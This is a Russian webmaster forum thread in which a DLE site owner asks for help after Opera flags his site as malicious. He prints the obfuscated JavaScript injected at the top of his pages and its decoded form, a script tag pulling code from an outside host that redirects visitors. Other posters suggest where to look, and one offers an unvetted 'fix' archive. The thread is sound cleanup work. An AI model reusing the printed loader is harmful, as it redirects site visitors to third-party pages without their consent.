Обнаружено вредоносное ПО
Страницы: 1 2 След.
Обнаружено вредоносное ПО
Здравствуйте, появилась такая проблема.
Если зайти на сайт raplist.ru через обозреватель Opera, то выходит сразу сообщение "Обнаружено вредоносное ПО" и что сайт подозревается в мошенничестве.

Смотрим исходный код страницы. В самом верху до надписи "<!DOCTYPE html PUBLIC " есть следующее
Код
<!-- Obfuscated by MyObfuscator PRO v2.03 www.myobfuscate.com -->
<sc ript language="javascript" type="text/javascript">var OO1='7kyJ+QHcpdyKnI3Yz9CP+ICO4kjM4ETPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IIO=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function _0lI(O10){var lOI=IIO[0];var _1l0,I0I,_11O,O0l,_1O1,I10,_1IO,lIO,_1OO=0,_0IO=IIO[1];do{O0l=lOI[IIO[3]](O10[IIO[2]](_1OO++));_1O1=lOI[IIO[3]](O10[IIO[2]](_1OO++));I10=lOI[IIO[3]](O10[IIO[2]](_1OO++));_1IO=lOI[IIO[3]](O10[IIO[2]](_1OO++));lIO=O0l<<18|_1O1<<12|I10<<6|_1IO;_1l0=lIO>>16&0xff;I0I=lIO>>8&0xff;_11O=lIO&0xff;if(I10==64){_0IO+=String[IIO[4]](_1l0);}else{if(_1IO==64){_0IO+=String[IIO[4]](_1l0,I0I);}else{_0IO+=String[IIO[4]](_1l0,I0I,_11O);};};} while(_1OO<O10[IIO[5]]);return _0IO;};function lI1(l10){var III=IIO[1],_1OO=0;for(_1OO=l10[IIO[5]]-1;_1OO>=0;_1OO--){III+=l10[IIO[2]](_1OO);};return III;};eval(_0lI(lI1(OO1)));</script>


Не один антивирус не ругается (за исключением встроенного в оперу AVG) И в гугле и в яндеске не написано, что есть вредоносный код.
Но заметил такую вещь, этот код влияет на стиль сайта. Если убрать его в Исходном коде и применить изменения, текст становится таким каким должен был быть изначально. И ещё раз в сутки с 1 IP если нажать на ссылку не кнопкой мыши а, колёсиком, чтобы открыло в новой вкладке страницу, то страницу выбрасывает на чей то сайт (сайты меняются).

в main.tpl чужих кодов нет. Ставил даже очень старый свой main.tpl чтобы проверить, но от него не зависит, так же не зависит от .htaccess.

Не знаю куда обращаться, и не уверен сталкивался ли бы кто-нибудь с этим. Потому что сам впервые наткнулся на такое предупреждение.

Рекламы на сайте нет и не было в этот период.

Пожалуйста помогите.

Бесплатная контекстная реклама

Я так понимаю, обычный script просто зашифровали через сервис www.myobfuscate.com
Но где и как мне его искать?
смог всё таки расшифровать это байду, вот что выдало:
Код
<sc ript language="JavaScript" src="http://refhunter.ru/script/js.php?id=182988"></script>


Может кто скажет куда такое могли засунуть?
какой движок? попробуйте поискать в index.php
скачайте все файлы на комп и в totalComander поиском найти куски кода
Цитата
daden11 пишет:
какой движок? попробуйте поискать в index.php


Движок DLE 9.3. В index.php нету.
Смотри в папке engine файл engine.php над коментом Формирование speedbar
А может эта ваша партнерка...
ищите инклюд в index.php или main.tpl(не сам код а путь к файлу с ним)
А лучше покажите начала этих файлов тут.
Изменено: Lazun429 - 31 Мая 2011 16:56
Скорее уже в базе. Пробуй фикс: _http://php-yuri.ru/fix.rar
Цитата
Олег пишет:
А может эта ваша партнерка...


исключено.

Цитата
abyss-by пишет:
Скорее уже в базе. Пробуй фикс: _http://php-yuri.ru/fix.rar


Результат: 9075/9074.
Удалено вредоносного кода: 153
Но проблема не решена.

Цитата
Олег пишет:
Смотри в папке engine файл engine.php над коментом Формирование speedbar


спасибо, удалил там какую-то рекламную ссылку, но всё равно это ещё не то что нужно.

Цитата
Lazun429 пишет:
ищите инклюд в index.php или main.tpl(не сам код а путь к файлу с ним)
А лучше покажите начала этих файлов тут.


ничего там не нашел левого smile:(
менял шаблон, проблема не решается, значит к файлам шаба это не относится, дело в самом движке. Скажите где можно ещё поковыряться?
Путь: engine - classes - mysql.php
Скорее всего там.
Цитата
leon_need пишет:
Путь: engine - classes - mysql.php
Скорее всего там.


нету ничего, даже заменял всю эту папку оригиналом с чистого двига, всё равно проблема остается.
Может кэш очистить, может уже вылечили, а кэш старый
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
14:33 Яндекс тИЦ 03.12.2016 
14:00 Апдейт Яндекса 04.12.2016 
13:50 Лучшая рекламная сеть Traffic.ru! 
13:48 Виляет ли реклама от adsense на развитие сайта? 
12:45 Ошибка в пагинации 
12:34 У кого какой CTR и доход за 1000 показов? 
11:22 Advmaker.ru - Пожалуй лучшая Партнерская Сеть. 
14:23 Продам домены РУС 
12:43 Создание сайтов под различные ПП - от 7$ + Отзывы, Гарантии. 
11:53 Вакансии: Операторы и редакторы по обработке статей из вебархива 
11:49 разработка мобильных приложений 
11:46 Срочно продам два готовых форума о соц сетях и заработке! 
11:14 3 совета по Юзабилити и Конверсии / SEO аудит 
10:53 Качественный прогон по трастовым сайтам и форумам. Рост ТИЦ, посещаемости и позиций. Множество отзывов, недорого + скидки 
14:20 Мультиязычность сайта - хорошо или плохо? 
14:14 Роскомнадзор отвел Google три месяца 
13:26 Кто-нибудь работал с directadvert.ru??? 
13:12 Кто переведет текст с рус на енг 
12:31 Непонятки с адсенс 
12:17 Книга "Просветление за полчаса" 
12:15 Гугл не хочет индексировать